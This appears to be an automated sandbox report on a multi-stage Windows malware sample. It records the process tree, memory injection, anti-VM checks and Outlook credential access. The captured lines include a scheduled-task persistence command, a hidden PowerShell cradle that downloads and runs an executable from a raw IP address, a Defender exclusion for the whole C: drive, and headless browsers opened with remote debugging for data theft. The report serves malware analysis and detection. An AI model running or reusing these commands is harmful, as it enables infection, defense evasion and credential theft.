pid Process 5040 2025-04-07_a32bbde67b7cb766932759cdd6847e9c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5040 2025-04-07_a32bbde67b7cb766932759cdd6847e9c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 5040 2025-04-07_a32bbde67b7cb766932759cdd6847e9c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
pid Process 6672 MSBuild.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 5040 wrote to memory of 2976 5040 2025-04-07_a32bbde67b7cb766932759cdd6847e9c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 5040 wrote to memory of 2976 5040 2025-04-07_a32bbde67b7cb766932759cdd6847e9c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 5040 wrote to memory of 2976 5040 2025-04-07_a32bbde67b7cb766932759cdd6847e9c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 86 PID 5040 wrote to memory of 4884 5040 2025-04-07_a32bbde67b7cb766932759cdd6847e9c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 5040 wrote to memory of 4884 5040 2025-04-07_a32bbde67b7cb766932759cdd6847e9c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 5040 wrote to memory of 4884 5040 2025-04-07_a32bbde67b7cb766932759cdd6847e9c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe 87 PID 2976 wrote to memory of 2164 2976 cmd.exe 89 PID 2976 wrote to memory of 2164 2976 cmd.exe 89 PID 2976 wrote to memory of 2164 2976 cmd.exe 89 PID 4884 wrote to memory of 2116 4884 mshta.exe 91 PID 4884 wrote to memory of 2116 4884 mshta.exe 91 PID 4884 wrote to memory of 2116 4884 mshta.exe 91 PID 2116 wrote to memory of 4572 2116 powershell.exe 100 PID 2116 wrote to memory of 4572 2116 powershell.exe 100 PID 2116 wrote to memory of 4572 2116 powershell.exe 100 PID 4572 wrote to memory of 4472 4572 TempLSUCRWKTHK44SOFCEHQXJG8G3AGREXFK.EXE 101 PID 4572 wrote to memory of 4472 4572 TempLSUCRWKTHK44SOFCEHQXJG8G3AGREXFK.EXE 101 PID 4572 wrote to memory of 4472 4572 TempLSUCRWKTHK44SOFCEHQXJG8G3AGREXFK.EXE 101 PID 4472 wrote to memory of 2556 4472 rapes.exe 105 PID 4472 wrote to memory of 2556 4472 rapes.exe 105 PID 2556 wrote to memory of 3624 2556 NlmvJyQ.exe 106 PID 2556 wrote to memory of 3624 2556 NlmvJyQ.exe 106 PID 2556 wrote to memory of 3624 2556 NlmvJyQ.exe 106 PID 2556 wrote to memory of 4124 2556 NlmvJyQ.exe 107 PID 2556 wrote to memory of 4124 2556 NlmvJyQ.exe 107 PID 2556 wrote to memory of 4124 2556 NlmvJyQ.exe 107 PID 2556 wrote to memory of 4124 2556 NlmvJyQ.exe 107 PID 2556 wrote to memory of 4124 2556 NlmvJyQ.exe 107 PID 2556 wrote to memory of 4124 2556 NlmvJyQ.exe 107 PID 2556 wrote to memory of 4124 2556 NlmvJyQ.exe 107 PID 2556 wrote to memory of 4124 2556 NlmvJyQ.exe 107 PID 2556 wrote to memory of 4124 2556 NlmvJyQ.exe 107 PID 4472 wrote to memory of 2324 4472 rapes.exe 108 PID 4472 wrote to memory of 2324 4472 rapes.exe 108 PID 2324 wrote to memory of 1664 2324 Nehh6wZ.exe 109 PID 2324 wrote to memory of 1664 2324 Nehh6wZ.exe 109 PID 2324 wrote to memory of 1664 2324 Nehh6wZ.exe 109 PID 2324 wrote to memory of 1664 2324 Nehh6wZ.exe 109 PID 2324 wrote to memory of 1664 2324 Nehh6wZ.exe 109 PID 2324 wrote to memory of 1664 2324 Nehh6wZ.exe 109 PID 2324 wrote to memory of 1664 2324 Nehh6wZ.exe 109 PID 2324 wrote to memory of 1664 2324 Nehh6wZ.exe 109 PID 2324 wrote to memory of 1664 2324 Nehh6wZ.exe 109 PID 4472 wrote to memory of 4376 4472 rapes.exe 110 PID 4472 wrote to memory of 4376 4472 rapes.exe 110 PID 4472 wrote to memory of 4376 4472 rapes.exe 110 PID 4472 wrote to memory of 4088 4472 rapes.exe 111 PID 4472 wrote to memory of 4088 4472 rapes.exe 111 PID 4472 wrote to memory of 4088 4472 rapes.exe 111 PID 4088 wrote to memory of 2492 4088 AfkeY2q.exe 114 PID 4088 wrote to memory of 2492 4088 AfkeY2q.exe 114 PID 4088 wrote to memory of 2492 4088 AfkeY2q.exe 114 PID 4088 wrote to memory of 2492 4088 AfkeY2q.exe 114 PID 4088 wrote to memory of 2492 4088 AfkeY2q.exe 114 PID 4088 wrote to memory of 2492 4088 AfkeY2q.exe 114 PID 4088 wrote to memory of 2492 4088 AfkeY2q.exe 114 PID 4088 wrote to memory of 2492 4088 AfkeY2q.exe 114 PID 4472 wrote to memory of 3992 4472 rapes.exe 121 PID 4472 wrote to memory of 3992 4472 rapes.exe 121 PID 4472 wrote to memory of 3992 4472 rapes.exe 121 PID 4472 wrote to memory of 1360 4472 rapes.exe 122 PID 4472 wrote to memory of 1360 4472 rapes.exe 122 PID 4472 wrote to memory of 1360 4472 rapes.exe 122 PID 1360 wrote to memory of 4052 1360 UZPt0hR.exe 123 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-83325578-304917428-1200496059-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 MSBuild.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\2025-04-07_a32bbde67b7cb766932759cdd6847e9c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"C:\Users\Admin\AppData\Local\Temp\2025-04-07_a32bbde67b7cb766932759cdd6847e9c_agent-tesla_black-basta_cobalt-strike_luca-stealer.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5040 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn HbU8MmaZHUg /tr "mshta C:\Users\Admin\AppData\Local\Temp\LIffOQ7Jy.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2976 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn HbU8MmaZHUg /tr "mshta C:\Users\Admin\AppData\Local\Temp\LIffOQ7Jy.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:2164
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\LIffOQ7Jy.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4884 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'LSUCRWKTHK44SOFCEHQXJG8G3AGREXFK.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2116 -
C:\Users\Admin\AppData\Local\TempLSUCRWKTHK44SOFCEHQXJG8G3AGREXFK.EXE"C:\Users\Admin\AppData\Local\TempLSUCRWKTHK44SOFCEHQXJG8G3AGREXFK.EXE"4⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4572 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4472 -
C:\Users\Admin\AppData\Local\Temp\10494790101\NlmvJyQ.exe"C:\Users\Admin\AppData\Local\Temp\10494790101\NlmvJyQ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2556 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵PID:3624
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4124
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494800101\Nehh6wZ.exe"C:\Users\Admin\AppData\Local\Temp\10494800101\Nehh6wZ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2324 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1664
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494810101\qhjMWht.exe"C:\Users\Admin\AppData\Local\Temp\10494810101\qhjMWht.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:4376
-
-
C:\Users\Admin\AppData\Local\Temp\10494820101\AfkeY2q.exe"C:\Users\Admin\AppData\Local\Temp\10494820101\AfkeY2q.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4088 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2492
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494830101\dfbccbcf79.exe"C:\Users\Admin\AppData\Local\Temp\10494830101\dfbccbcf79.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Writes to the Master Boot Record (MBR)
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3992
-
-
C:\Users\Admin\AppData\Local\Temp\10494840101\UZPt0hR.exe"C:\Users\Admin\AppData\Local\Temp\10494840101\UZPt0hR.exe"6⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1360 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'7⤵PID:4052
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2748
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"7⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:4324 -
C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe"C:\ProgramData\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\tzutil.exe" ""8⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
PID:5032 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell Remove-MpPreference -ExclusionPath C:\9⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:13104
-
-
-
C:\Users\Admin\AppData\Local\Temp\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe"C:\Users\Admin\AppData\Local\Temp\\{425F784E-921A-4CC0-AE87-06A3B0393A0E}\w32tm.exe" ""8⤵
- Deletes itself
- Executes dropped EXE
PID:4760 -
C:\Users\Admin\AppData\Local\Temp\{c93378ba-ffaf-49b2-8bbe-a488c8c63352}\5feb513d.exe"C:\Users\Admin\AppData\Local\Temp\{c93378ba-ffaf-49b2-8bbe-a488c8c63352}\5feb513d.exe" -accepteula -adinsilent -silent -processlevel 2 -postboot9⤵
- Executes dropped EXE
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
PID:7840 -
C:\Users\Admin\AppData\Local\Temp\{df84ef37-e060-4f6d-a9ae-3aba7612aee2}\af476d2b.exeC:/Users/Admin/AppData/Local/Temp/{df84ef37-e060-4f6d-a9ae-3aba7612aee2}/\af476d2b.exe -accepteula -adinsilent -silent -processlevel 2 -postboot10⤵
- Drops file in Drivers directory
- Sets service image path in registry
- Executes dropped EXE
- Impair Defenses: Safe Mode Boot
- Loads dropped DLL
- Adds Run key to start application
- Enumerates connected drives
- Writes to the Master Boot Record (MBR)
- Checks for VirtualBox DLLs, possible anti-VM trick
- System Location Discovery: System Language Discovery
- Suspicious behavior: LoadsDriver
PID:9288
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494850101\ibC8xs1.exe"C:\Users\Admin\AppData\Local\Temp\10494850101\ibC8xs1.exe"6⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of SetThreadContext
- Suspicious use of AdjustPrivilegeToken
PID:6496 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\acjnz4fp\acjnz4fp.cmdline"7⤵PID:6544
-
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESA8FD.tmp" "c:\Users\Admin\AppData\Local\Temp\acjnz4fp\CSCAE4F6482C4A04D04A0F31E81D1A1182.TMP"8⤵PID:6624
-
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- Downloads MZ/PE file
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
PID:6672 -
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:8108
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Modifies registry class
- Suspicious use of FindShellTrayWindow
PID:10588
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵
- Suspicious use of FindShellTrayWindow
PID:7264
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe--restore-last-session --remote-debugging-port=9223 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --profile-directory="Default"8⤵
- Uses browser remote debugging
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
PID:7320 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0x10c,0x110,0x114,0xe8,0x118,0x7ffb215ddcf8,0x7ffb215ddd04,0x7ffb215ddd109⤵PID:7416
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2060,i,16319341063534115740,17888671857103233512,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2036 /prefetch:29⤵PID:8180
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2176,i,16319341063534115740,17888671857103233512,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2172 /prefetch:39⤵PID:5296
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --field-trial-handle=2428,i,16319341063534115740,17888671857103233512,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2424 /prefetch:89⤵PID:544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3288,i,16319341063534115740,17888671857103233512,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3284 /prefetch:19⤵
- Uses browser remote debugging
PID:8456
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3556,i,16319341063534115740,17888671857103233512,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3552 /prefetch:19⤵
- Uses browser remote debugging
PID:8468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4396,i,16319341063534115740,17888671857103233512,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4392 /prefetch:29⤵
- Uses browser remote debugging
PID:8756
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4692,i,16319341063534115740,17888671857103233512,262144 --disable-features=PaintHolding --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4688 /prefetch:19⤵
- Uses browser remote debugging
PID:9056
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe--restore-last-session --remote-debugging-port=9225 --remote-allow-origins=* --headless "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --profile-directory="Default"8⤵
- Uses browser remote debugging
PID:5920 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x238,0x23c,0x240,0x234,0x248,0x7ffb1f3bf208,0x7ffb1f3bf214,0x7ffb1f3bf2209⤵PID:12232
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --headless --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2020,i,10514278593677656422,15080292668182076161,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2012 /prefetch:29⤵PID:12620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2284,i,10514278593677656422,15080292668182076161,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2280 /prefetch:39⤵PID:12604
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=2616,i,10514278593677656422,15080292668182076161,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=2612 /prefetch:89⤵PID:12772
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3628,i,10514278593677656422,15080292668182076161,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3624 /prefetch:19⤵
- Uses browser remote debugging
PID:13156
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --instant-process --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3676,i,10514278593677656422,15080292668182076161,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3660 /prefetch:19⤵
- Uses browser remote debugging
PID:5060
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=4232,i,10514278593677656422,15080292668182076161,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4236 /prefetch:19⤵
- Uses browser remote debugging
PID:4852
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --extension-process --renderer-sub-type=extension --remote-debugging-port=9225 --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4312,i,10514278593677656422,15080292668182076161,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=4308 /prefetch:29⤵
- Uses browser remote debugging
PID:2064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3968,i,10514278593677656422,15080292668182076161,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3980 /prefetch:89⤵PID:6268
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --noerrdialogs --user-data-dir="C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --always-read-main-dll --field-trial-handle=3936,i,10514278593677656422,15080292668182076161,262144 --disable-features=PaintHolding --variations-seed-version --mojo-platform-channel-handle=3932 /prefetch:89⤵PID:6472
-
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵PID:4900
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵PID:9088
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵PID:12760
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵PID:10020
-
-
C:\Windows\system32\rundll32.exe"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#618⤵PID:1204
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10494860101\v1BRaoR.exe"C:\Users\Admin\AppData\Local\Temp\10494860101\v1BRaoR.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:7488 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:7556 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 7556 -s 12528⤵
- Program crash
